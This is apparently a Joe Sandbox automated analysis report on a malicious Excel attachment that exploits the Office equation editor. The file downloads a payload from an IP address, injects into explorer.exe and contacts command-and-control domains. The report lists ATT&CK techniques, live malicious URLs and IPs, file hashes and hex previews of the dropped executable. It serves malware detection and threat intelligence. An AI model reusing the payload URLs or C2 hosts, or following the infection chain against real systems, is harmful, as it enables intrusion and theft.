          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528788 Sample: New order - C.S.I No. 04183.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 13 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 29 2->15         started        process3 dnsIp4 47 103.171.1.140, 49165, 80 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 10->47 35 C:\Users\user\AppData\Local\...\.vbc[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 17 10->17         started        39 C:\...\~$New order - C.S.I No. 04183.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\folvcfp.dll, PE32 17->33 dropped 57 Machine Learning detection for dropped file 17->57 59 Tries to detect virtualization through RDTSC time measurements 17->59 61 Injects a PE file into a foreign processes 17->61 21 vbc.exe 17->21         started        signatures9 process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.oojry.xyz 104.21.82.75, 49166, 80 CLOUDFLARENETUS United States 24->41 43 www.crystalsbyzoe.com 24->43 45 3 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 73 Performs DNS queries to domains with low reputation 24->73 28 cscript.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New order - C.S.I No. 04183.xlsx36%VirustotalBrowse
          New order - C.S.I No. 04183.xlsx36%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.2980000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cscript.exe.3e22f0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cscript.exe.2a4f840.7.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.oojry.xyz3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.crystalsbyzoe.com/og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN0%Avira URL Cloudsafe
          http://103.171.1.140/384500000_1/.vbc.exe9%VirustotalBrowse
          http://103.171.1.140/384500000_1/.vbc.exe100%Avira URL Cloudmalware
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.celikkaya.xyz/og2w/0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com
          		34.246.239.131
          		truefalse
            		high
            www.oojry.xyz
            		104.21.82.75
            		truetrueunknown
            www.crystalsbyzoe.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.crystalsbyzoe.com/og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MNtrue
              • Avira URL Cloud: safe
              		unknown
              http://103.171.1.140/384500000_1/.vbc.exetrue
              • 9%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              www.celikkaya.xyz/og2w/true
              • Avira URL Cloud: safe
              		low
              http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MNtrue
              • Avira URL Cloud: phishing
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://investor.msn.comexplorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.drfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpfalse
                          		high
                          http://java.sun.comexplorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.drfalse
                              		high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmpfalse
                                		high
                                http://investor.msn.com/explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469685487.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.531572707.0000000004513000.00000004.00000001.sdmpfalse
                                    		high
                                    http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.%s.comPAvbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		low
                                    http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpfalse
                                      		high
                                      https://support.mozilla.orgexplorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpfalse
                                        		high
                                        http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.484932398.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662313228.0000000001E70000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.500166360.0000000001E70000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.171.1.140
                                        		unknownunknown
                                        		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                        34.246.239.131
                                        		dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comUnited States
                                        		16509AMAZON-02USfalse
                                        104.21.82.75
                                        		www.oojry.xyzUnited States
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:528788
                                        Start date:25.11.2021
                                        Start time:19:22:14
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 57s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:New order - C.S.I No. 04183.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@9/24@2/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 45.6% (good quality ratio 42.5%)
                                        • Quality average: 73.9%
                                        • Quality standard deviation: 30.5%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 86
                                        • Number of non-executed functions: 109
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • Not all processes where analyzed, report is missing behavior information

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        19:23:36API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                                        19:23:44API Interceptor35x Sleep call for process: vbc.exe modified
                                        19:24:00API Interceptor211x Sleep call for process: cscript.exe modified
                                        19:24:55API Interceptor1x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        103.171.1.140PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.140/4267111111_2/.vbc.exe
                                        0416ORTX20497421.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.140/76190111111_1/.vbc.exe
                                        ShzuSh.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.140/x386w/.vbc.exe
                                        209673.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.140/774757m/.vbc.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comQUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                        • 54.171.119.91
                                        RX6TtlclV1.exeGet hashmaliciousBrowse
                                        • 54.171.119.91
                                        NICHIDEN VIET NAM - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                        • 54.171.119.91
                                        4C0P93ko4u.exeGet hashmaliciousBrowse
                                        • 52.208.193.50
                                        triage_dropped_file.exeGet hashmaliciousBrowse
                                        • 54.171.119.91
                                        New order payment.exeGet hashmaliciousBrowse
                                        • 52.210.179.84
                                        Diagram and Specifications.exeGet hashmaliciousBrowse
                                        • 52.210.179.84
                                        ZeVbJ7HLUZ.exeGet hashmaliciousBrowse
                                        • 34.254.166.140
                                        bank.doc.exeGet hashmaliciousBrowse
                                        • 34.243.160.251
                                        E1bCgdZF3a.msiGet hashmaliciousBrowse
                                        • 52.50.39.94
                                        FaxMessage5645345.htmlGet hashmaliciousBrowse
                                        • 52.17.15.53
                                        enlu5xSNKV.exeGet hashmaliciousBrowse
                                        • 52.49.20.157
                                        New _Items.Xlsx.Pdf.exeGet hashmaliciousBrowse
                                        • 54.246.199.25
                                        9V3LjvhSMb.exeGet hashmaliciousBrowse
                                        • 52.49.20.157
                                        COAU7229898130.xlsxGet hashmaliciousBrowse
                                        • 34.240.98.209
                                        PO # 5524792.exeGet hashmaliciousBrowse
                                        • 34.248.153.214
                                        order.exe.exeGet hashmaliciousBrowse
                                        • 52.48.207.46

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CLOUDFLARENETUSekZDWpGPTB.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Acct # 3288-1258-4NQ39NGAY0GD'pdf.ppamGet hashmaliciousBrowse
                                        • 104.16.202.237
                                        Acct # 3288-1258-1NQ39NGAY0GD'pdf.ppamGet hashmaliciousBrowse
                                        • 104.16.203.237
                                        Credit Card and ID.ppamGet hashmaliciousBrowse
                                        • 104.16.203.237
                                        P.O-5433ERE.docGet hashmaliciousBrowse
                                        • 172.67.184.102
                                        Quotation No. Q07387.docGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        hSlk750R2b.exeGet hashmaliciousBrowse
                                        • 104.23.98.190
                                        Order Contract_signed (2NQ39NGAY0GD).ppamGet hashmaliciousBrowse
                                        • 104.16.203.237
                                        Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        Hong Jin International Co Ltd -Order Specification.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        ORDER PROPOSAL.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        8p2NlqFgew.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        TT COPY_02101011.exeGet hashmaliciousBrowse
                                        • 172.67.158.42
                                        GZ4OR9sIdP.exeGet hashmaliciousBrowse
                                        • 172.67.188.154
                                        4lWWTrEJuS.exeGet hashmaliciousBrowse
                                        • 104.21.31.203
                                        TT_SWIFT_Export Order_noref S10SMG00318021.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        TxIDbatch#7809.htmGet hashmaliciousBrowse
                                        • 104.16.18.94
                                        Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        Google_Play_Store_flow_split.apkGet hashmaliciousBrowse
                                        • 104.21.4.48
                                        Statement.htmlGet hashmaliciousBrowse
                                        • 104.16.18.94
                                        AMAZON-02USTsOl2c6Yc6Get hashmaliciousBrowse
                                        • 35.76.103.249
                                        6kW7j4xN7gGet hashmaliciousBrowse
                                        • 18.156.164.126
                                        GLV715572436.xlsmGet hashmaliciousBrowse
                                        • 65.2.149.25
                                        2qu14BdrnDGet hashmaliciousBrowse
                                        • 18.176.176.141
                                        CSOIYQRONAGPE1.xlsmGet hashmaliciousBrowse
                                        • 18.192.215.191
                                        TT COPY_02101011.exeGet hashmaliciousBrowse
                                        • 3.96.23.237
                                        armGet hashmaliciousBrowse
                                        • 13.49.178.146
                                        cK1g5gckZR9VHjj.exeGet hashmaliciousBrowse
                                        • 3.64.163.50
                                        Nuevo Pedido.exeGet hashmaliciousBrowse
                                        • 3.64.163.50
                                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                                        • 3.64.163.50
                                        OPKyR75fJn.exeGet hashmaliciousBrowse
                                        • 52.218.1.8
                                        Ljm7n1QDZeGet hashmaliciousBrowse
                                        • 52.53.23.55
                                        E9HT1FxV8BGet hashmaliciousBrowse
                                        • 52.52.93.219
                                        SOA.exeGet hashmaliciousBrowse
                                        • 99.83.154.118
                                        a.r.m.v.6.lGet hashmaliciousBrowse
                                        • 54.171.230.55
                                        meerkat.arm7Get hashmaliciousBrowse
                                        • 52.56.234.247
                                        2MzNonluPUGet hashmaliciousBrowse
                                        • 34.249.145.219
                                        sfhJLQhj84.exeGet hashmaliciousBrowse
                                        • 3.131.99.219
                                        Proforma invoice for order-PO 2108137 R1.exeGet hashmaliciousBrowse
                                        • 3.145.25.98
                                        mal1.htmlGet hashmaliciousBrowse
                                        • 13.224.193.20
                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNeFacturas Pagadas al Vencimiento.xlsxGet hashmaliciousBrowse
                                        • 103.167.90.66
                                        MV LILY SEA.xlsxGet hashmaliciousBrowse
                                        • 103.170.254.66
                                        VDI-QUOTATION-PAYMENT.xlsxGet hashmaliciousBrowse
                                        • 103.167.92.133
                                        6kW7j4xN7gGet hashmaliciousBrowse
                                        • 103.191.211.172
                                        DETAILS.vbsGet hashmaliciousBrowse
                                        • 103.167.84.150
                                        20211125 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                                        • 103.167.92.73
                                        meerkat.x86Get hashmaliciousBrowse
                                        • 103.160.46.142
                                        oQANZnrt9dGet hashmaliciousBrowse
                                        • 103.163.1.44
                                        y8CYO3E0MFGet hashmaliciousBrowse
                                        • 130.222.22.174
                                        RFQ_PO-330758290144.xlsxGet hashmaliciousBrowse
                                        • 103.167.92.57
                                        PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.140
                                        NQsLN1nOONGet hashmaliciousBrowse
                                        • 103.170.35.74
                                        ANT_0402205_001_144747_20211117.xlsxGet hashmaliciousBrowse
                                        • 103.167.92.73
                                        IAENMAI.xlsxGet hashmaliciousBrowse
                                        • 103.167.90.66
                                        IAENMAI.xlsxGet hashmaliciousBrowse
                                        • 103.167.90.66
                                        psI4iJBgiAGet hashmaliciousBrowse
                                        • 138.7.41.139
                                        sora.arm-20211123-2050Get hashmaliciousBrowse
                                        • 103.181.193.3
                                        20212311.xlsxGet hashmaliciousBrowse
                                        • 103.171.1.219
                                        justificantes anticipos.xlsxGet hashmaliciousBrowse
                                        • 103.167.90.66
                                        20211118 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                                        • 103.167.92.73

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):475934
                                        Entropy (8bit):6.263679071719373
                                        Encrypted:false
                                        SSDEEP:6144:2Gi2L3NWrOG5s3ytYBz5Sy/M3L+uM4jMzfWO/j4zR03bze/XOpSmREM3:hUb5krzwR3LIfL4zq3baOEEz3
                                        MD5:4D1B51FE258BE32D346B3507ABEDDCB3
                                        SHA1:977A34967B0B42A19969DD1106EF74439D306DCE
                                        SHA-256:0C6D57557120DECEDC9A102794EA95BCAF64529EB1F18058E4DF62C34B724988
                                        SHA-512:27330F64606CFEBBE834E2D419E5F34207C1BFBBAE22DA52763C8FE8E48A001D52E2C5AB1B93EE9CFD2E5B4DF02C09628F82BE2CD5D340CA0711C004AED1EC12
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        IE Cache URL:http://103.171.1.140/384500000_1/.vbc.exe
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@.......................... ...............................................t.......p..p............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...p....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B711330.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BA6FB7C.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
